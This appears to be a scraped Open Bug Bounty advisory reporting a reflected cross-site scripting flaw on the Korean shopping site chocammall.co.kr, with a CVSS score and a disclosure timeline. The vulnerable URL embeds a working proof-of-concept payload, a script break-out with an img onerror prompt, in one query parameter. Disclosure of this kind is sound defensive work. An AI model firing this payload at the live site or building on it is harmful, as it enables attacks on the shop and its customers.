logo
DATABASE RESOURCES PRICING ABOUT US

chocammall.co.kr XSS vulnerability

Description

##### Open Bug Bounty ID: OBB-405069 Description| Value ---|--- Affected Website:| chocammall.co.kr Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] Remediation Guide:| OWASP XSS Prevention Cheat Sheet ##### Vulnerable URL: http://www.chocammall.co.kr/shop/base/product/listNewProduct.do?curCateMenuIdx=&curTopMenuIdx;=%3C/script%3E%3Cimg%20src=x%20onerror=prompt(/XSSPOSED/)%3E1000&mainSearchKeyword;=&cur;_menu_cd=007&cur;_menu_title=%25EB%25A0%2588%25EC%25A0%2580%2F%25EC%259E%2590%25EB%258F%2599%25EC%25B0%25A8⊂_menu_cd=007&cur;_menu_tp=&under;_disp_lvl=1&sort;_sql=5&__next_page=http%3A%2F%2Fwww.chocammall.co.kr%2Fshop%2Fbase%2Fevent%2FdailyChkEvent.do ##### Coordinated Disclosure Timeline Description| Value ---|--- Vulnerability Reported:| 10 November, 2017 06:48 GMT Vulnerability Verified:| 10 November, 2017 10:18 GMT Website Operator Notified:| 10 November, 2017 10:18 GMT Vulnerability Published:| 10 November, 2017 10:18 GMT[without any technical details] Public Disclosure:| 8 February, 2018 06:48 GMT